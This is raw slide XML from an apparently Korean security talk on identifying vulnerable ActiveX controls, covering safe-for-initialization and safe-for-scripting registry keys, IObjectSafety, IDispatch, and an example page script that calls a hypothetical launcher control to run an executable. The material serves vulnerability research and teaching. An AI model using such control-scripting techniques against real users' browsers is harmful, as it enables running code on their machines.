            <a:ext cx="6072230" cy="214314"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3175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en-US" sz="2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굴림" pitchFamily="50" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="사각형 설명선 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="560354" y="1423177"/>
            <a:ext cx="9787006" cy="857256"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -15540"/>
              <a:gd name="adj2" fmla="val 181428"/>
            </a:avLst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  <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="0" dirty="0" smtClean="0"/>
              <a:t>Internet Explorer has blocked this site from using an ActiveX control in an unsafe manner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84E0BF4-C6D9-4C81-BC06-57545E3805F3}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="717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ko-KR" dirty="0" smtClean="0"/>
              <a:t>ActiveX Controls in Korea</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="그룹 13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="488916" y="1494616"/>
            <a:ext cx="5214974" cy="3314718"/>
            <a:chOff x="488916" y="1494616"/>
            <a:chExt cx="5214974" cy="3314718"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="모서리가 둥근 직사각형 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="488916" y="1851805"/>
              <a:ext cx="5214974" cy="2500330"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="non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ko-KR" altLang="en-US" sz="2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굴림" pitchFamily="50" charset="-127"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1030" name="Picture 6" descr="C:\Documents and Settings\sweetlie\바탕 화면\addiction.bmp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703230" y="1994681"/>
              <a:ext cx="4810125" cy="1009650"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1031" name="Picture 7" descr="C:\Documents and Settings\sweetlie\바탕 화면\recommend.bmp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703230" y="3066251"/>
              <a:ext cx="4838700" cy="1152525"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="사각형 설명선 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="774668" y="1494616"/>
              <a:ext cx="3368702" cy="500065"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -64098"/>
                <a:gd name="adj2" fmla="val -16477"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" algn="ctr">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>| http://blogs.zdnet.com/Ou/?p=412</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp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741337" y="4209259"/>
              <a:ext cx="962025" cy="600075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</p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="그룹 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4703757" y="3709202"/>
            <a:ext cx="5429289" cy="3390912"/>
            <a:chOff x="4703757" y="3709202"/>
            <a:chExt cx="5429289" cy="3390912"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="모서리가 둥근 직사각형 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4703757" y="4066383"/>
              <a:ext cx="5429289" cy="2786082"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="non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ko-KR" altLang="en-US" sz="2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굴림" pitchFamily="50" charset="-127"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="사각형 설명선 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6632584" y="3709202"/>
              <a:ext cx="3428990" cy="428619"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 63902"/>
                <a:gd name="adj2" fmla="val -37650"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" algn="ctr">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>| http://www.slipperybrick.com/2007/01/vista-adoption-|will-be-slow-in-south-korea</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="700" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1029" name="Picture 5" descr="C:\Documents and Settings\sweetlie\바탕 화면\slowdown.bmp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4918072" y="4190227"/>
              <a:ext cx="4972050" cy="2590800"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1027" name="Picture 3"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads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4918072" y="6709589"/>
              <a:ext cx="1704975" cy="390525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</p:grp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8AC3D07-8505-46A1-8F04-B37C796206FB}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2560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ko-KR" dirty="0" smtClean="0"/>
              <a:t>Safe Initialization</a:t>
            </a:r>
          </a:p>
        </p:txBody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ko-KR" dirty="0" smtClean="0"/>
              <a:t>ActiveX control can be marked as safe for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>initialization </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>by</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Creating the registry key {7DD95802-9882-11CF-9FA9-00AA006C42C4} </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Under \HKCR\CLSID\&lt;CLSID of the ActiveX control&gt;\Implemented Categories\</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" i="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>implementing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>IObjectSafety</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean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1892" y="1637491"/>
            <a:ext cx="10531508" cy="50950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8AC3D07-8505-46A1-8F04-B37C796206FB}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2560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ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Procedure for </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Potentially Vulnerable Control Identification</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody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US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="직사각형 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2846370" y="4209259"/>
            <a:ext cx="5357850" cy="1643074"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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en-US" sz="2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굴림" pitchFamily="50" charset="-127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ko-KR" dirty="0" smtClean="0"/>
              <a:t>ActiveX control should support </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>IDispatch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>IDispatchEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> interface to expose methods</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 2" descr="C:\DOCUME~1\sweetlie\LOCALS~1\Temp\VMwareDnD\00006842\ie.bmp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846238" y="2494747"/>
            <a:ext cx="6500858" cy="4286240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic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8AC3D07-8505-46A1-8F04-B37C796206FB}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2560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ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>IDispatch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>IDispatchEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> Interfaces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917676" y="3423481"/>
            <a:ext cx="5982600" cy="218521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altLang="ko-KR" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;object id=“PokerLauncher" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>classid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>clsid:xxxxxxxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>-…"&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>        &lt;param name="Server" value="http://update.server.com/"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/object&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PokerLauncher.StartGame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("poker.exe");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/script&gt;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8AC3D07-8505-46A1-8F04-B37C796206FB}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2560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ko-KR" dirty="0" smtClean="0"/>
              <a:t>Not Safe For Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody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US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="C:\Documents and Settings\sweetlie\바탕 화면\ErrorMsg.bmp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17544" y="2423309"/>
            <a:ext cx="6072230" cy="4554174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917544" y="3566317"/>
            <a:ext cx="5982600" cy="260071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altLang="ko-KR" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;object id=“PokerLauncher" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>classid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>clsid:xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>        &lt;param name="Server" value="http://update.server.com/"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/object&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PokerLauncher.StartGame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("poker.exe");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 2" descr="H:\methodroErr.bmp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03890" y="2566185"/>
            <a:ext cx="4162425" cy="2762250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="사각형 설명선 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3632188" y="1566053"/>
            <a:ext cx="6500858" cy="714380"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 9371"/>
              <a:gd name="adj2" fmla="val 358021"/>
            </a:avLst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  <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" dirty="0" smtClean="0"/>
              <a:t>Object doesn’t support this property or method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8AC3D07-8505-46A1-8F04-B37C796206FB}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2560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ko-KR" dirty="0" smtClean="0"/>
              <a:t>Safe Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody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ko-KR" dirty="0" smtClean="0"/>
              <a:t>ActiveX control can be marked as safe for scripting by</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Creating the registry key {7DD95801-9882-11CF-9FA9-00AA006C42C4} </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Under \HKCR\CLSID\&lt;CLSID of the ActiveX control&gt;\Implemented Categories\</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" i="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>implementing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>IObjectSafety</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean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1892" y="1637491"/>
            <a:ext cx="10531508" cy="50950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8AC3D07-8505-46A1-8F04-B37C796206FB}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2560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ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Procedure for </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
